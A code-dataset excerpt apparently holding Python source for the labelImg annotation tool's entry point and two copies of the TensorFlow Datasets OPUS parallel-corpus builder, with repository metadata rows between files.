        currIndex = self.mImgList.index(self.filePath)
        if currIndex - 1 >= 0:
            prevFilePath = self.mImgList[currIndex - 1]
            self.showBoundingBoxFromAnnotationFile(prevFilePath)
            self.saveFile()

    def togglePaintLabelsOption(self):
        """Show or hide label text painted on top of each shape."""
        for shape in self.canvas.shapes:
            shape.paintLabel = self.displayLabelOption.isChecked()

    def toogleDrawSquare(self):
        """Constrain drawing to squares. (Typo in the name is kept: external
        callers bind this method by name.)"""
        self.canvas.setDrawingShapeToSquare(self.drawSquaresOption.isChecked())
def inverted(color):
    """Return a new QColor with every RGBA channel inverted (255 - value)."""
    r, g, b, a = color.getRgb()
    # Note: the alpha channel is inverted too, matching original behavior.
    return QColor(255 - r, 255 - g, 255 - b, 255 - a)
def read(filename, default=None):
    """Read an image file via QImageReader with EXIF auto-rotation applied.

    Returns the decoded QImage, or *default* if reading raises.
    """
    try:
        reader = QImageReader(filename)
        reader.setAutoTransform(True)
        return reader.read()
    except Exception:
        # Was a bare 'except:', which also swallowed KeyboardInterrupt and
        # SystemExit; narrow it so those still propagate.
        return default
def get_main_app(argv=None):
    """Create the QApplication and main window.

    Args:
        argv: full command-line argument list (argv[0] is the program name).
            Defaults to an empty list; 'None' replaces the previous mutable
            default-list anti-pattern while keeping behavior identical.

    Returns:
        (app, win): the QApplication and the shown MainWindow. The caller
        must keep both references alive and run app.exec_().
    """
    if argv is None:
        argv = []
    app = QApplication(argv)
    app.setApplicationName(__appname__)
    app.setWindowIcon(newIcon("app"))
    # Tzutalin 201705+: Accept extra arguments to change predefined class file
    argparser = argparse.ArgumentParser()
    argparser.add_argument("image_dir", nargs="?")
    argparser.add_argument("predefined_classes_file",
                           default=os.path.join(os.path.dirname(__file__), "data", "predefined_classes.txt"),
                           nargs="?")
    argparser.add_argument("save_dir", nargs="?")
    args = argparser.parse_args(argv[1:])
    # Usage : labelImg.py image predefClassFile saveDir
    win = MainWindow(args.image_dir,
                     args.predefined_classes_file,
                     args.save_dir)
    win.show()
    return app, win
def main():
    """Entry point: start the Qt application and return its exit code."""
    application, _window = get_main_app(sys.argv)
    # Keeping _window referenced prevents it from being garbage-collected
    # while the event loop runs.
    return application.exec_()
if __name__ == '__main__':
sys.exit(main())
| true | true |
1c2cc1ba216c583d4886860a8ada7e287c0932c6 | 13,343 | py | Python | tensorflow_datasets/translate/opus.py | ChAnYaNG97/datasets | 0a45e2ea98716d325fc1c5e5494f2575f3bdb908 | [
"Apache-2.0"
] | 1 | 2020-10-11T19:15:49.000Z | 2020-10-11T19:15:49.000Z | tensorflow_datasets/translate/opus.py | ChAnYaNG97/datasets | 0a45e2ea98716d325fc1c5e5494f2575f3bdb908 | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/translate/opus.py | ChAnYaNG97/datasets | 0a45e2ea98716d325fc1c5e5494f2575f3bdb908 | [
"Apache-2.0"
] | 1 | 2020-08-03T20:19:12.000Z | 2020-08-03T20:19:12.000Z | # coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""opus dataset."""
import os
from absl import logging
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_CITATION = """
@inproceedings{Tiedemann2012ParallelData,
author = {Tiedemann, J},
title = {Parallel Data, Tools and Interfaces in OPUS},
booktitle = {LREC}
year = {2012}}
"""
_DESCRIPTION = """
OPUS is a collection of translated texts from the web.
Create your own config to choose which data / language pair to load.
```
config = tfds.translate.opus.OpusConfig(
version=tfds.core.Version('0.1.0'),
language_pair=("de", "en"),
subsets=["GNOME", "EMEA"]
)
builder = tfds.builder("opus", config=config)
```
"""
class SubDataset():
  """Metadata holder describing one sub-corpus of OPUS."""

  def __init__(self, name, description, homepage, url, languages):
    """Sub-dataset of OPUS.

    Args:
      name: `string`, a unique dataset identifier.
      description: `string`, a description of the dataset.
      homepage: `string`, homepage of the dataset.
      url: `string`, download url for the dataset.
      languages: `<list>(string)`, a list of supported languages.
    """
    self.name = name
    self.description = description
    self.homepage = homepage
    self.url = url
    # Every unordered pair of distinct languages, alphabetically ordered
    # within each pair and across the whole list.
    ordered = sorted(languages)
    self.language_pairs = [
        (src, tgt)
        for i, src in enumerate(ordered)
        for tgt in ordered[i + 1:]
    ]
DATASET_MAP = {ds.name: ds for ds in [ # pylint:disable=g-complex-comprehension
# pylint:disable=line-too-long
SubDataset(
name="EMEA",
description="A parallel corpus made out of PDF documents from the European Medicines Agency.",
homepage="http://opus.nlpl.eu/EMEA.php",
url="http://opus.nlpl.eu/download.php?f=EMEA/v3/moses/",
languages=["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"]
),
SubDataset(
name="JRC-Acquis",
description="A collection of legislative text of the European Union and currently comprises selected texts written between the 1950s and now.",
homepage="http://opus.nlpl.eu/JRC-Acquis.php",
url="http://opus.nlpl.eu/download.php?f=JRC-Acquis/",
languages=["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"]
),
SubDataset(
name="Tanzil",
description="A collection of Quran translations compiled by the Tanzil project.",
homepage="http://opus.nlpl.eu/Tanzil.php",
url="http://opus.nlpl.eu/download.php?f=Tanzil/v1/moses/",
languages=["am", "ar", "az", "bg", "bn", "bs", "cs", "de", "dv", "en", "es", "fa", "fr", "ha", "hi", "id", "it", "ja", "ko", "ku", "ml", "ms", "nl", "no", "pl", "pt", "ro", "ru", "sd", "so", "sq", "sv", "sw", "ta", "tg", "th", "tr", "tt", "ug", "ur", "uz", "zh"]
),
SubDataset(
name="GNOME",
description="A parallel corpus of GNOME localization files. Source: https://l10n.gnome.org",
homepage="http://opus.nlpl.eu/GNOME.php",
url="http://opus.nlpl.eu/download.php?f=GNOME/v1/moses/",
languages=["af", "am", "an", "ang", "ar", "ar_TN", "ara", "as", "ast", "az", "az_IR", "bal", "be", "bem", "bg", "bg_BG", "bn", "bn_IN", "bo", "br", "brx", "bs", "ca", "cat", "crh", "cs", "csb", "cy", "da", "da_DK", "de", "de_CH", "dv", "dz", "el", "en", "en_AU", "en_CA", "en_GB", "en_NZ", "en_US", "en_ZA", "eo", "es", "es_AR", "es_CL", "es_CO", "es_CR", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN", "es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_SV", "es_UY", "es_VE", "et", "eu", "fa", "fa_IR", "fi", "fo", "foo", "fr", "fur", "fy", "ga", "gd", "gl", "gn", "gr", "gu", "gv", "ha", "he", "hi", "hi_IN", "hr", "hu", "hy", "ia", "id", "ig", "io", "is", "it", "it_IT", "ja", "jbo", "ka", "kg", "kk", "km", "kn", "ko", "kr", "ks", "ku", "ky", "la", "lg", "li", "lo", "lt", "lv", "mai", "mg", "mi", "mk", "ml", "mn", "mr", "ms", "ms_MY", "mt", "mus", "my", "nb", "nb_NO", "nds", "ne", "nhn", "nl", "nn", "nn_NO", "no", "no_nb", "nqo", "nr", "nso", "oc", "or", "os", "pa", "pl", "ps", "pt", "pt_BR", "pt_PT", "quz", "ro", "ru", "rw", "si", "sk", "sl", "so", "sq", "sr", "sr_ME", "st", "sv", "sw", "szl", "ta", "te", "tg", "tg_TJ", "th", "tk", "tl", "tl_PH", "tmp", "tr", "tr_TR", "ts", "tt", "ug", "uk", "ur", "ur_PK", "uz", "vi", "vi_VN", "wa", "xh", "yi", "yo", "zh_CN", "zh_HK", "zh_TW", "zu"]
),
SubDataset(
name="KDE4",
description="A parallel corpus of KDE4 localization files (v.2).",
homepage="http://opus.nlpl.eu/KDE4.php",
url="http://opus.nlpl.eu/download.php?f=KDE4/v2/moses/",
languages=["af", "ar", "as", "ast", "be", "bg", "bn", "bn_IN", "br", "ca", "crh", "cs", "csb", "cy", "da", "de", "el", "en", "en_GB", "eo", "es", "et", "eu", "fa", "fi", "fr", "fy", "ga", "gl", "gu", "ha", "he", "hi", "hne", "hr", "hsb", "hu", "hy", "id", "is", "it", "ja", "ka", "kk", "km", "kn", "ko", "ku", "lb", "lt", "lv", "mai", "mk", "ml", "mr", "ms", "mt", "nb", "nds", "ne", "nl", "nn", "nso", "oc", "or", "pa", "pl", "ps", "pt", "pt_BR", "ro", "ru", "rw", "se", "si", "sk", "sl", "sr", "sv", "ta", "te", "tg", "th", "tr", "uk", "uz", "vi", "wa", "xh", "zh_CN", "zh_HK", "zh_TW"]
),
SubDataset(
name="PHP",
description="A parallel corpus originally extracted from http://se.php.net/download-docs.php.",
homepage="http://opus.nlpl.eu/PHP.php",
url="http://opus.nlpl.eu/download.php?f=PHP/v1/moses/",
languages=["cs", "de", "en", "es", "fi", "fr", "he", "hu", "it", "ja", "ko", "nl", "pl", "pt_BR", "ro", "ru", "sk", "sl", "sv", "tr", "tw", "zh", "zh_TW"]
),
SubDataset(
name="Ubuntu",
description="A parallel corpus of Ubuntu localization files. Source: https://translations.launchpad.net",
homepage="http://opus.nlpl.eu/Ubuntu.php",
url="http://opus.nlpl.eu/download.php?f=Ubuntu/v14.10/moses/",
languages=["ace", "af", "ak", "am", "an", "ang", "ar", "ar_SY", "ary", "as", "ast", "az", "ba", "bal", "be", "bem", "ber", "bg", "bho", "bn", "bn_IN", "bo", "br", "brx", "bs", "bua", "byn", "ca", "ce", "ceb", "chr", "ckb", "co", "crh", "cs", "csb", "cv", "cy", "da", "de", "de_AT", "de_DE", "dsb", "dv", "dz", "el", "en", "en_AU", "en_CA", "en_GB", "en_NZ", "en_US", "eo", "es", "es_AR", "es_CL", "es_CO", "es_CR", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN", "es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_SV", "es_UY", "es_VE", "et", "eu", "fa", "fa_AF", "ff", "fi", "fil", "fo", "fr", "fr_CA", "fr_FR", "frm", "frp", "fur", "fy", "ga", "gd", "gl", "gn", "grc", "gu", "guc", "gv", "ha", "haw", "he", "hi", "hil", "hne", "hr", "hsb", "ht", "hu", "hy", "ia", "id", "ig", "io", "is", "it", "iu", "ja", "jbo", "jv", "ka", "kab", "kg", "kk", "kl", "km", "kn", "ko", "kok", "ks", "ksh", "ku", "kw", "ky", "la", "lb", "lg", "li", "lij", "lld", "ln", "lo", "lt", "ltg", "lv", "mai", "mg", "mh", "mhr", "mi", "miq", "mk", "ml", "mn", "mo", "mr", "ms", "mt", "mus", "my", "nan", "nap", "nb", "nds", "ne", "nhn", "nl", "nl_NL", "nn", "no", "nso", "ny", "oc", "oj", "om", "or", "os", "pa", "pam", "pap", "pl", "pms", "pmy", "ps", "pt", "pt_BR", "pt_PT", "qu", "rm", "ro", "rom", "ru", "rw", "sa", "sc", "sco", "sd", "se", "shn", "shs", "si", "sk", "sl", "sm", "sml", "sn", "so", "son", "sq", "sr", "st", "sv", "sw", "syr", "szl", "ta", "ta_LK", "te", "tet", "tg", "th", "ti", "tk", "tl", "tlh", "tr", "trv", "ts", "tt", "ug", "uk", "ur", "uz", "ve", "vec", "vi", "wa", "wae", "wo", "xal", "xh", "yi", "yo", "zh", "zh_CN", "zh_HK", "zh_TW", "zu", "zza"]
),
SubDataset(
name="OpenOffice",
description="A collection of documents from http://www.openoffice.org/.",
homepage="http://opus.nlpl.eu/OpenOffice-v2.php",
url="http://opus.nlpl.eu/download.php?f=OpenOffice/v2/moses/",
languages=["de", "en", "es", "fr", "jp", "sv"]
),
SubDataset(
name="OpenSubtitles",
description="A new collection of translated movie subtitles from http://www.opensubtitles.org/",
homepage="http://opus.nlpl.eu/OpenSubtitles-v2018.php",
url="http://opus.nlpl.eu/download.php?f=OpenSubtitles/v2018/moses/",
languages=["af", "ar", "bg", "bn", "br", "bs", "ca", "cs", "da", "de", "el", "en", "eo", "es", "et", "eu", "fa", "fi", "fr", "gl", "he", "hi", "hr", "hu", "hy", "id", "is", "it", "ja", "ka", "kk", "ko", "lt", "lv", "mk", "ml", "ms", "nl", "no", "pl", "pt", "pt_br", "ro", "ru", "si", "sk", "sl", "sq", "sr", "sv", "ta", "te", "th", "tl", "tr", "uk", "ur", "vi", "ze_en", "ze_zh", "zh_cn", "zh_tw"]
)
]}
class OpusConfig(tfds.core.BuilderConfig):
  """BuilderConfig for Opus."""

  def __init__(self, *, language_pair, subsets, **kwargs):
    """BuilderConfig for Opus.

    Args:
      language_pair: `(string, string)`, pair of languages used for translation.
        Should contain 2 letter coded strings (e.g. "de", "en")
      subsets: `<list>(string)`, list of the subdatasets to use.
      **kwargs: keyword arguments forwarded to super.
    """
    sorted_language_pair = sorted(language_pair)
    # Auto-generate a descriptive config name when the caller gave none.
    name = kwargs.get("name", "%s-%s for %s" % (
        sorted_language_pair[0], sorted_language_pair[1], ", ".join(subsets)))

    description = name + " documents"
    # dict(kwargs, name=name) makes the (possibly generated) name override
    # whatever 'name' kwargs may have carried.
    super(OpusConfig, self).__init__(
        description=description, **dict(kwargs, name=name))

    self.language_pair = sorted_language_pair
    self.subsets = subsets
class Opus(tfds.core.GeneratorBasedBuilder):
  """OPUS is a collection of translated texts from the web."""

  # Named groups of sub-corpora; each becomes one BuilderConfig below.
  _KK_SUBSETS = [
      ("medical", ["EMEA"]),
      ("law", ["JRC-Acquis"]),
      ("koran", ["Tanzil"]),
      ("IT", ["GNOME", "KDE4", "PHP", "Ubuntu", "OpenOffice"]),
      ("subtitles", ["OpenSubtitles"])
  ]

  # NOTE(review): the string below is a bare expression statement, not a
  # docstring (it does not follow a def/class header); kept as-is.
  """The following configurations reproduce the evaluation tasks from "Six
  Challenges for Neural Machine Translation" by Philipp Koehn and Rebecca
  Knowles (2017) https://www.aclweb.org/anthology/W17-3204.pdf"""
  BUILDER_CONFIGS = [
      OpusConfig( # pylint:disable=g-complex-comprehension
          version=tfds.core.Version("0.1.0"),
          language_pair=("de", "en"),
          subsets=subsets,
          name=name
      ) for name, subsets in _KK_SUBSETS
  ]

  @property
  def subsets(self):
    # Return only the datasets that exist for the language pair.
    source, target = self.builder_config.language_pair
    filtered_subsets = []
    for dataset in [DATASET_MAP[name] for name in self.builder_config.subsets]:
      if (source, target) in dataset.language_pairs:
        filtered_subsets.append(dataset)
    return filtered_subsets

  def _info(self):
    """Returns the DatasetInfo describing features and supervised keys."""
    src, target = self.builder_config.language_pair
    return tfds.core.DatasetInfo(
        builder=self,
        description=_DESCRIPTION + "\n" + self.builder_config.description,
        features=tfds.features.Translation(
            languages=self.builder_config.language_pair),
        supervised_keys=(src, target),
        homepage="http://opus.nlpl.eu/",
        citation=_CITATION,
    )

  def _split_generators(self, dl_manager):
    """Downloads each sub-corpus and yields a single TRAIN split."""
    source, target = self.builder_config.language_pair
    # OPUS moses archives are named like "de-en.txt.zip" and unpack to
    # "<corpus>.<de-en>.<lang>" files.
    file_ext = "%s-%s"%(source, target)
    subsets = []
    for item in self.subsets:
      dl_dir = dl_manager.download_and_extract(
          os.path.join(item.url, "%s.txt.zip"%file_ext))
      source_file = os.path.join(
          dl_dir, "%s.%s.%s"%(item.name, file_ext, source))
      target_file = os.path.join(
          dl_dir, "%s.%s.%s"%(item.name, file_ext, target))
      subsets.append({
          "name": item.name,
          "source_file": source_file,
          "target_file": target_file
      })
    return [
        tfds.core.SplitGenerator(
            name=tfds.Split.TRAIN,
            gen_kwargs={"subsets": subsets}
        )
    ]

  def _generate_examples(self, subsets):
    """Yields (key, example) pairs by zipping the aligned line files."""
    source, target = self.builder_config.language_pair
    for item in subsets:
      logging.info("Generating examples from: %s", item["name"])
      source_file = item["source_file"]
      target_file = item["target_file"]
      gens = [_gen_line(source_file), _gen_line(target_file)]
      for idx, (source_sent, target_sent) in enumerate(zip(*gens)):
        result = {source: source_sent, target: target_sent}
        # Skip pairs where either side is empty.
        if all(result.values()):
          key = "%s/%d"%(item["name"], idx)
          yield key, result
def _gen_line(filename):
  """Yields the lines of an OPUS data file one at a time."""
  with tf.io.gfile.GFile(filename) as f:
    yield from f
| 51.717054 | 1,652 | 0.562092 |
import os
from absl import logging
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_CITATION = """
@inproceedings{Tiedemann2012ParallelData,
author = {Tiedemann, J},
title = {Parallel Data, Tools and Interfaces in OPUS},
booktitle = {LREC}
year = {2012}}
"""
_DESCRIPTION = """
OPUS is a collection of translated texts from the web.
Create your own config to choose which data / language pair to load.
```
config = tfds.translate.opus.OpusConfig(
version=tfds.core.Version('0.1.0'),
language_pair=("de", "en"),
subsets=["GNOME", "EMEA"]
)
builder = tfds.builder("opus", config=config)
```
"""
class SubDataset():
  """Describes one OPUS corpus: where it lives and which languages it covers."""

  def __init__(self, name, description, homepage, url, languages):
    """
    :param name: corpus name as used in the OPUS download paths.
    :param description: human-readable summary of the corpus.
    :param homepage: corpus homepage URL.
    :param url: base download URL for the corpus archives.
    :param languages: iterable of language codes present in the corpus.
    """
    self.name = name
    self.description = description
    self.homepage = homepage
    self.url = url
    # Every unordered pair of distinct languages, each pair sorted and the
    # whole list in lexicographic order.
    ordered = sorted(languages)
    self.language_pairs = [
        (ordered[i], ordered[j])
        for i in range(len(ordered))
        for j in range(i + 1, len(ordered))
    ]
DATASET_MAP = {ds.name: ds for ds in [
SubDataset(
name="EMEA",
description="A parallel corpus made out of PDF documents from the European Medicines Agency.",
homepage="http://opus.nlpl.eu/EMEA.php",
url="http://opus.nlpl.eu/download.php?f=EMEA/v3/moses/",
languages=["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"]
),
SubDataset(
name="JRC-Acquis",
description="A collection of legislative text of the European Union and currently comprises selected texts written between the 1950s and now.",
homepage="http://opus.nlpl.eu/JRC-Acquis.php",
url="http://opus.nlpl.eu/download.php?f=JRC-Acquis/",
languages=["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"]
),
SubDataset(
name="Tanzil",
description="A collection of Quran translations compiled by the Tanzil project.",
homepage="http://opus.nlpl.eu/Tanzil.php",
url="http://opus.nlpl.eu/download.php?f=Tanzil/v1/moses/",
languages=["am", "ar", "az", "bg", "bn", "bs", "cs", "de", "dv", "en", "es", "fa", "fr", "ha", "hi", "id", "it", "ja", "ko", "ku", "ml", "ms", "nl", "no", "pl", "pt", "ro", "ru", "sd", "so", "sq", "sv", "sw", "ta", "tg", "th", "tr", "tt", "ug", "ur", "uz", "zh"]
),
SubDataset(
name="GNOME",
description="A parallel corpus of GNOME localization files. Source: https://l10n.gnome.org",
homepage="http://opus.nlpl.eu/GNOME.php",
url="http://opus.nlpl.eu/download.php?f=GNOME/v1/moses/",
languages=["af", "am", "an", "ang", "ar", "ar_TN", "ara", "as", "ast", "az", "az_IR", "bal", "be", "bem", "bg", "bg_BG", "bn", "bn_IN", "bo", "br", "brx", "bs", "ca", "cat", "crh", "cs", "csb", "cy", "da", "da_DK", "de", "de_CH", "dv", "dz", "el", "en", "en_AU", "en_CA", "en_GB", "en_NZ", "en_US", "en_ZA", "eo", "es", "es_AR", "es_CL", "es_CO", "es_CR", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN", "es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_SV", "es_UY", "es_VE", "et", "eu", "fa", "fa_IR", "fi", "fo", "foo", "fr", "fur", "fy", "ga", "gd", "gl", "gn", "gr", "gu", "gv", "ha", "he", "hi", "hi_IN", "hr", "hu", "hy", "ia", "id", "ig", "io", "is", "it", "it_IT", "ja", "jbo", "ka", "kg", "kk", "km", "kn", "ko", "kr", "ks", "ku", "ky", "la", "lg", "li", "lo", "lt", "lv", "mai", "mg", "mi", "mk", "ml", "mn", "mr", "ms", "ms_MY", "mt", "mus", "my", "nb", "nb_NO", "nds", "ne", "nhn", "nl", "nn", "nn_NO", "no", "no_nb", "nqo", "nr", "nso", "oc", "or", "os", "pa", "pl", "ps", "pt", "pt_BR", "pt_PT", "quz", "ro", "ru", "rw", "si", "sk", "sl", "so", "sq", "sr", "sr_ME", "st", "sv", "sw", "szl", "ta", "te", "tg", "tg_TJ", "th", "tk", "tl", "tl_PH", "tmp", "tr", "tr_TR", "ts", "tt", "ug", "uk", "ur", "ur_PK", "uz", "vi", "vi_VN", "wa", "xh", "yi", "yo", "zh_CN", "zh_HK", "zh_TW", "zu"]
),
SubDataset(
name="KDE4",
description="A parallel corpus of KDE4 localization files (v.2).",
homepage="http://opus.nlpl.eu/KDE4.php",
url="http://opus.nlpl.eu/download.php?f=KDE4/v2/moses/",
languages=["af", "ar", "as", "ast", "be", "bg", "bn", "bn_IN", "br", "ca", "crh", "cs", "csb", "cy", "da", "de", "el", "en", "en_GB", "eo", "es", "et", "eu", "fa", "fi", "fr", "fy", "ga", "gl", "gu", "ha", "he", "hi", "hne", "hr", "hsb", "hu", "hy", "id", "is", "it", "ja", "ka", "kk", "km", "kn", "ko", "ku", "lb", "lt", "lv", "mai", "mk", "ml", "mr", "ms", "mt", "nb", "nds", "ne", "nl", "nn", "nso", "oc", "or", "pa", "pl", "ps", "pt", "pt_BR", "ro", "ru", "rw", "se", "si", "sk", "sl", "sr", "sv", "ta", "te", "tg", "th", "tr", "uk", "uz", "vi", "wa", "xh", "zh_CN", "zh_HK", "zh_TW"]
),
SubDataset(
name="PHP",
description="A parallel corpus originally extracted from http://se.php.net/download-docs.php.",
homepage="http://opus.nlpl.eu/PHP.php",
url="http://opus.nlpl.eu/download.php?f=PHP/v1/moses/",
languages=["cs", "de", "en", "es", "fi", "fr", "he", "hu", "it", "ja", "ko", "nl", "pl", "pt_BR", "ro", "ru", "sk", "sl", "sv", "tr", "tw", "zh", "zh_TW"]
),
SubDataset(
name="Ubuntu",
description="A parallel corpus of Ubuntu localization files. Source: https://translations.launchpad.net",
homepage="http://opus.nlpl.eu/Ubuntu.php",
url="http://opus.nlpl.eu/download.php?f=Ubuntu/v14.10/moses/",
languages=["ace", "af", "ak", "am", "an", "ang", "ar", "ar_SY", "ary", "as", "ast", "az", "ba", "bal", "be", "bem", "ber", "bg", "bho", "bn", "bn_IN", "bo", "br", "brx", "bs", "bua", "byn", "ca", "ce", "ceb", "chr", "ckb", "co", "crh", "cs", "csb", "cv", "cy", "da", "de", "de_AT", "de_DE", "dsb", "dv", "dz", "el", "en", "en_AU", "en_CA", "en_GB", "en_NZ", "en_US", "eo", "es", "es_AR", "es_CL", "es_CO", "es_CR", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN", "es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_SV", "es_UY", "es_VE", "et", "eu", "fa", "fa_AF", "ff", "fi", "fil", "fo", "fr", "fr_CA", "fr_FR", "frm", "frp", "fur", "fy", "ga", "gd", "gl", "gn", "grc", "gu", "guc", "gv", "ha", "haw", "he", "hi", "hil", "hne", "hr", "hsb", "ht", "hu", "hy", "ia", "id", "ig", "io", "is", "it", "iu", "ja", "jbo", "jv", "ka", "kab", "kg", "kk", "kl", "km", "kn", "ko", "kok", "ks", "ksh", "ku", "kw", "ky", "la", "lb", "lg", "li", "lij", "lld", "ln", "lo", "lt", "ltg", "lv", "mai", "mg", "mh", "mhr", "mi", "miq", "mk", "ml", "mn", "mo", "mr", "ms", "mt", "mus", "my", "nan", "nap", "nb", "nds", "ne", "nhn", "nl", "nl_NL", "nn", "no", "nso", "ny", "oc", "oj", "om", "or", "os", "pa", "pam", "pap", "pl", "pms", "pmy", "ps", "pt", "pt_BR", "pt_PT", "qu", "rm", "ro", "rom", "ru", "rw", "sa", "sc", "sco", "sd", "se", "shn", "shs", "si", "sk", "sl", "sm", "sml", "sn", "so", "son", "sq", "sr", "st", "sv", "sw", "syr", "szl", "ta", "ta_LK", "te", "tet", "tg", "th", "ti", "tk", "tl", "tlh", "tr", "trv", "ts", "tt", "ug", "uk", "ur", "uz", "ve", "vec", "vi", "wa", "wae", "wo", "xal", "xh", "yi", "yo", "zh", "zh_CN", "zh_HK", "zh_TW", "zu", "zza"]
),
SubDataset(
name="OpenOffice",
description="A collection of documents from http://www.openoffice.org/.",
homepage="http://opus.nlpl.eu/OpenOffice-v2.php",
url="http://opus.nlpl.eu/download.php?f=OpenOffice/v2/moses/",
languages=["de", "en", "es", "fr", "jp", "sv"]
),
SubDataset(
name="OpenSubtitles",
description="A new collection of translated movie subtitles from http://www.opensubtitles.org/",
homepage="http://opus.nlpl.eu/OpenSubtitles-v2018.php",
url="http://opus.nlpl.eu/download.php?f=OpenSubtitles/v2018/moses/",
languages=["af", "ar", "bg", "bn", "br", "bs", "ca", "cs", "da", "de", "el", "en", "eo", "es", "et", "eu", "fa", "fi", "fr", "gl", "he", "hi", "hr", "hu", "hy", "id", "is", "it", "ja", "ka", "kk", "ko", "lt", "lv", "mk", "ml", "ms", "nl", "no", "pl", "pt", "pt_br", "ro", "ru", "si", "sk", "sl", "sq", "sr", "sv", "ta", "te", "th", "tl", "tr", "uk", "ur", "vi", "ze_en", "ze_zh", "zh_cn", "zh_tw"]
)
]}
class OpusConfig(tfds.core.BuilderConfig):
  """BuilderConfig selecting a language pair and a set of OPUS subsets."""

  def __init__(self, *, language_pair, subsets, **kwargs):
    """
    :param language_pair: two language codes; stored sorted.
    :param subsets: names of OPUS corpora (keys of DATASET_MAP) to include.
    :param kwargs: forwarded to BuilderConfig; a default `name` is derived
      from the pair and subsets when not supplied.
    """
    pair = sorted(language_pair)
    default_name = "%s-%s for %s" % (pair[0], pair[1], ", ".join(subsets))
    name = kwargs.get("name", default_name)
    super(OpusConfig, self).__init__(
        description=name + " documents", **dict(kwargs, name=name))
    self.language_pair = pair
    self.subsets = subsets
class Opus(tfds.core.GeneratorBasedBuilder):
  """Translation datasets built from OPUS parallel corpora.

  Each BuilderConfig (OpusConfig) names a sorted language pair plus the
  OPUS subsets (corpora) to draw aligned sentences from.
  """

  # Named (domain, subsets) presets for the de-en configs below.
  # NOTE(review): "_KK_" presumably refers to the Koehn & Knowles
  # domain splits -- confirm before documenting it as such.
  _KK_SUBSETS = [
    ("medical", ["EMEA"]),
    ("law", ["JRC-Acquis"]),
    ("koran", ["Tanzil"]),
    ("IT", ["GNOME", "KDE4", "PHP", "Ubuntu", "OpenOffice"]),
    ("subtitles", ["OpenSubtitles"])
  ]
  # One prebuilt de-en config per domain preset.
  BUILDER_CONFIGS = [
    OpusConfig(
      version=tfds.core.Version("0.1.0"),
      language_pair=("de", "en"),
      subsets=subsets,
      name=name
    ) for name, subsets in _KK_SUBSETS
  ]

  @property
  def subsets(self):
    """The configured SubDatasets that actually offer this language pair."""
    source, target = self.builder_config.language_pair
    filtered_subsets = []
    for dataset in [DATASET_MAP[name] for name in self.builder_config.subsets]:
      if (source, target) in dataset.language_pairs:
        filtered_subsets.append(dataset)
    return filtered_subsets

  def _info(self):
    """Returns DatasetInfo: a Translation feature keyed by language codes."""
    src, target = self.builder_config.language_pair
    return tfds.core.DatasetInfo(
      builder=self,
      description=_DESCRIPTION + "\n" + self.builder_config.description,
      features=tfds.features.Translation(
        languages=self.builder_config.language_pair),
      supervised_keys=(src, target),
      homepage="http://opus.nlpl.eu/",
      citation=_CITATION,
    )

  def _split_generators(self, dl_manager):
    """Downloads each subset's archive and returns a single TRAIN split."""
    source, target = self.builder_config.language_pair
    file_ext = "%s-%s"%(source, target)
    subsets = []
    for item in self.subsets:
      # Each subset ships one zip holding both sides of the pair.
      dl_dir = dl_manager.download_and_extract(
        os.path.join(item.url, "%s.txt.zip"%file_ext))
      source_file = os.path.join(
        dl_dir, "%s.%s.%s"%(item.name, file_ext, source))
      target_file = os.path.join(
        dl_dir, "%s.%s.%s"%(item.name, file_ext, target))
      subsets.append({
        "name": item.name,
        "source_file": source_file,
        "target_file": target_file
      })
    return [
      tfds.core.SplitGenerator(
        name=tfds.Split.TRAIN,
        gen_kwargs={"subsets": subsets}
      )
    ]

  def _generate_examples(self, subsets):
    """Yields (key, {src: sentence, tgt: sentence}) aligned pairs."""
    source, target = self.builder_config.language_pair
    for item in subsets:
      logging.info("Generating examples from: %s", item["name"])
      source_file = item["source_file"]
      target_file = item["target_file"]
      gens = [_gen_line(source_file), _gen_line(target_file)]
      for idx, (source_sent, target_sent) in enumerate(zip(*gens)):
        result = {source: source_sent, target: target_sent}
        # Drop pairs where either side is empty.
        if all(result.values()):
          key = "%s/%d"%(item["name"], idx)
          yield key, result
def _gen_line(filename):
  """Yields sentences (lines) from an OPUS data file."""
  with tf.io.gfile.GFile(filename) as f:
    for line in f:
      yield line
| true | true |
1c2cc24b8fafab54aaa4c0912bcd55b0fd7489ec | 14,237 | py | Python | pants-plugins/src/python/internal_backend/sitegen/tasks/sitegen.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 1 | 2018-12-10T21:31:02.000Z | 2018-12-10T21:31:02.000Z | pants-plugins/src/python/internal_backend/sitegen/tasks/sitegen.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 2 | 2016-10-13T21:37:42.000Z | 2018-07-20T20:14:33.000Z | pants-plugins/src/python/internal_backend/sitegen/tasks/sitegen.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
